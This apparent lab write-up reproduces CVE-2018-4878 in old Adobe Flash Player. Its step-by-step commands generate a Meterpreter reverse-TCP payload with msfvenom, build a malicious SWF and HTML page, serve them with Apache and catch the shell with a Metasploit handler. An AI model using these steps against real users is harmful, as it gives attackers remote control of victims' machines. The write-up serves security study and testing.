table of Contents
Vulnerability description
This vulnerability is aimed at users who have installed flash version 28.0.0.137 or less. The attacker induces users to click on malicious websites to directly obtain shell permissions.
Impact version
Less than or equal to Adobe Flash Player 28.0.0.137 version
Vulnerability detection
Use tool:
https://github.com/anbai-inc/CVE-2018-4878
Put index.html and exploit.swf on our own web server and let the target machine access them. Sometimes the computer can pop up, and sometimes the IE browser crashes. It is estimated that the script is unstable.
Exploit
Adobe Flash Player 28.0.0.137 Download:
https://pan.baidu.com/s/1Si3PDbR6cGwkGITJUTikYg Extraction code: p9ok
Attack machine: kali
Target machine: windows7 +Adobe Flash Player 28.0.0.137
Kali first download the use tool:
git clone https://github.com/anbai-inc/CVE-2018-4878.git
cd CVE-2018-4878
msfvenom生成shellcode:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f python>./shellcode.txt
Replace the shellcode in the shellcode.txt text with the shellcode in cve-2018-4847.py
Continue to modify the swf and html generation path (exp generation directory)
Run the script to generate exp:
python cve-2018-4878.py
Start apache2:
service apache2 start
Copy exp to the web directory:
cp exploit.swf /var/www/html/
cp index.html /var/www/html/
msf open monitoring:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
shell
whoami
When the target visits our generated html, it will get shell permissions
But later I found that sometimes it is unsuccessful, which also causes ie crash.
Vulnerability hardening
Update flash plugin: https://www.flash.cn/